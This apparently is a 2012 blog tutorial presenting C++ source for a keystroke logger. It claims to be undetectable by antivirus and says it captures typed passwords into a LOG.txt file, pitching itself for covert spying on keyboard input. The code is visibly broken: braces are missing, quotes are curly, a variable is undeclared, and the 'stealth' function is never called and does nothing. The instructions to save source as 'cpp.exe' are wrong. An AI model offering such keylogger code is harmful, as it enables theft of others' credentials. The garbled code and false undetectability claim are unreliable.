Saturday 1 September 2012

How to make a Home made key logger undetectable by all anti viruses

Hey guise, i am giving you a trick to make a home made key logger which is undetectable by all antiviruses made in the World.
how to made a non-detectable key logger in minutes at your own and 100% working
To made a key logger you have to do the following ways:_
  • Open Visual C++
  • then make a new file
  • then paste the following coding
  • Paste the coding below and the save it as cpp.exe
    #include <iostream.h>
    using namespace std;
    #include <windows.h>
    #include <winuser.h>
    int Save (int key_stroke, char *file);
    void Stealth();
    int main()
    char i;
    while (1)
    for(i = 8; i <= 190; i++)
    if (GetAsyncKeyState(i) == -32767)
    Save (i,”LOG.txt”);
    system (“PAUSE”);
    return 0;
    /* *********************************** */
    int Save (int key_stroke, char *file)
    if ( (key_stroke == 1) || (key_stroke == 2) )
    return 0;
    OUTPUT_FILE = fopen(file, “a+”);
    cout << key_stroke << endl;
    if (key_stroke == 8)
    fprintf(OUTPUT_FILE, “%s”, “[BACKSPACE]“);
    else if (key_stroke == 13)
    fprintf(OUTPUT_FILE, “%s”, “\n”);
    else if (key_stroke == 32)
    fprintf(OUTPUT_FILE, “%s”, ” “);
    else if (key_stroke == VK_TAB)
    fprintf(OUTPUT_FILE, “%s”, “[TAB]“);
    else if (key_stroke == VK_SHIFT)
    fprintf(OUTPUT_FILE, “%s”, “[SHIFT]“);
    else if (key_stroke == VK_CONTROL)
    fprintf(OUTPUT_FILE, “%s”, “[CONTROL]“);
    else if (key_stroke == VK_ESCAPE)
    fprintf(OUTPUT_FILE, “%s”, “[ESCAPE]“);
    else if (key_stroke == VK_END)
    fprintf(OUTPUT_FILE, “%s”, “[END]“);
    else if (key_stroke == VK_HOME)
    fprintf(OUTPUT_FILE, “%s”, “[HOME]“);
    else if (key_stroke == VK_LEFT)
    fprintf(OUTPUT_FILE, “%s”, “[LEFT]“);
    else if (key_stroke == VK_UP)
    fprintf(OUTPUT_FILE, “%s”, “[UP]“);
    else if (key_stroke == VK_RIGHT)
    fprintf(OUTPUT_FILE, “%s”, “[RIGHT]“);
    else if (key_stroke == VK_DOWN)
    fprintf(OUTPUT_FILE, “%s”, “[DOWN]“);
    else if (key_stroke == 190 || key_stroke == 110)
    fprintf(OUTPUT_FILE, “%s”, “.”);
    fprintf(OUTPUT_FILE, “%s”, &key_stroke);
    fclose (OUTPUT_FILE);
    return 0;
    /* *********************************** */
    void Stealth()
    HWND Stealth;
    Stealth = FindWindowA(“ConsoleWindowClass”, NULL);
  • Now go the folder where the file cpp.exe saved and the open it.
  • Now your key logger is working in background and trapping all key strokes
  • If you want to see the trapp key logs, then go to tha same folder where the cpp.exe file is stored and go to log.txt file and opens it
  • it will show you all trap keywords or passwords.

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